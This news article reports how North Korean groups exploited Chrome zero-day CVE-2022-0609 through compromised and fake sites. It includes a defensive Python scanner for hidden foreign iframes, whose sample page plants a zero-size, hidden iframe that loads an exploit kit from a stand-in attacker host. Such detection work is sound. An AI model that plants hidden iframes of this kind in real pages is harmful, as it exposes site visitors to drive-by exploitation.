The attackers used the vulnerability against media, IT companies, cryptocurrency and financial organizations.
North Korean state-backed hackers exploited a zero-day vulnerability in the Google Chrome browser to remotely execute code in attacks on news media, IT companies, cryptocurrency and financial institutions.
Google's Threat Analysis Group (TAG) has linked two malicious campaigns exploiting the CVE-2022-0609 vulnerability to two groups attributed to the North Korean government.
The attackers emailed potential victims, lured them to fake websites or compromised legitimate ones, which ultimately served an exploit kit for CVE-2022-0609.
Google TAG discovered the campaign on February 10 of this year, and Google fixed the vulnerability in an emergency Chrome update four days later, on February 14. The earliest evidence of exploitation of the zero-day was found on January 4, 2022.
One of the two North Korean groups targeted more than 250 people working at 10 different news media outlets, domain registrars, web hosting providers and software vendors. According to the researchers, this activity matches the North Korean cyber-espionage campaign Operation Dream Job, described in detail by ClearSky researchers in August 2020.
The second campaign targeted more than 85 users in the cryptocurrency and financial technology industries and is linked to the group behind Operation AppleJeus. Its operators compromised at least two legitimate fintech websites and planted hidden iframes that loaded the exploit kit. In other cases, the researchers found fake websites set up to distribute trojanized cryptocurrency applications.
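A hidden iframe pointing at a foreign origin is the injection pattern described above, and it is something a site owner can check for in a saved copy of their pages. The following scanner is an added example, not code from Google TAG or from the article; the page URL, hostnames and HTML below are constructed for illustration. It flags iframes that are both hidden (zero size, `display:none`, `visibility:hidden`, `opacity:0`, pushed off-screen, or the `hidden` attribute) and sourced from a host other than the page's own.

```python
"""Scan an HTML document for hidden iframes that load content from a
foreign origin. Added example, not code from Google TAG or the article;
the sample page and hostnames below are constructed."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Inline-style patterns commonly used to keep an iframe out of sight.
HIDDEN_STYLE = re.compile(
    r"display\s*:\s*none|visibility\s*:\s*hidden|opacity\s*:\s*0(?![.\d])"
    r"|(?:left|top)\s*:\s*-\d{3,}",
    re.I,
)


def _is_tiny(value):
    """True for width/height attributes such as '0', '0px' or '1'."""
    m = re.match(r"\s*(\d+)", value or "")
    return bool(m) and int(m.group(1)) <= 1


class IframeCollector(HTMLParser):
    """Collect the attribute dict of every <iframe> start tag."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag == "iframe":
            # Boolean attributes (e.g. hidden) arrive with a None value,
            # so keep them as keys rather than testing their value later.
            self.iframes.append(dict(attrs))


def find_hidden_foreign_iframes(html, page_url):
    """Return iframes that are hidden AND load from a host other than
    the page's own. Each finding lists the src and why it was flagged."""
    page_host = (urlparse(page_url).hostname or "").lower()
    parser = IframeCollector()
    parser.feed(html)
    findings = []
    for attrs in parser.iframes:
        src = attrs.get("src") or ""
        src_host = (urlparse(src).hostname or "").lower()
        # Relative src (no host) is same-origin and not of interest here.
        foreign = bool(src_host) and src_host != page_host
        reasons = []
        if _is_tiny(attrs.get("width")) or _is_tiny(attrs.get("height")):
            reasons.append("zero-size")
        if HIDDEN_STYLE.search(attrs.get("style") or ""):
            reasons.append("hidden-style")
        if "hidden" in attrs:
            reasons.append("hidden-attr")
        if foreign and reasons:
            findings.append({"src": src, "reasons": reasons})
    return findings


# Constructed sample page: one legitimate visible embed, one injected
# hidden iframe on a foreign host, one hidden but same-origin widget.
SAMPLE_HTML = """<html><body>
<h1>Quarterly report</h1>
<iframe src="https://www.youtube.com/embed/abc" width="560" height="315"></iframe>
<iframe src="https://cdn.example-attacker.test/ek.html" width="0" height="0"
        style="display:none"></iframe>
<iframe src="/help/widget" style="visibility:hidden"></iframe>
</body></html>"""

if __name__ == "__main__":
    for f in find_hidden_foreign_iframes(SAMPLE_HTML, "https://fintech.example.test/report"):
        print(f"suspicious iframe: {f['src']} ({', '.join(f['reasons'])})")
```

Only the injected frame is reported; the visible YouTube embed is foreign but not hidden, and the hidden help widget is same-origin. The check is a triage aid, not proof of compromise: a flagged frame still has to be compared against the site's deployed source to confirm it was planted.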
The attackers built in several safeguards that made it harder to recover the later stages of the exploit chain needed to compromise a target. For example, the iframe pointing at the exploit kit was served only at specific times, some targets received unique identifiers, each stage of the kit (including the client's responses) was encrypted, and the next stage was delivered only if the previous one had succeeded.
The researchers also found evidence that the North Korean hackers were not interested solely in Google Chrome users: visitors using Safari and Mozilla Firefox were also profiled and sent links to attacker-controlled servers.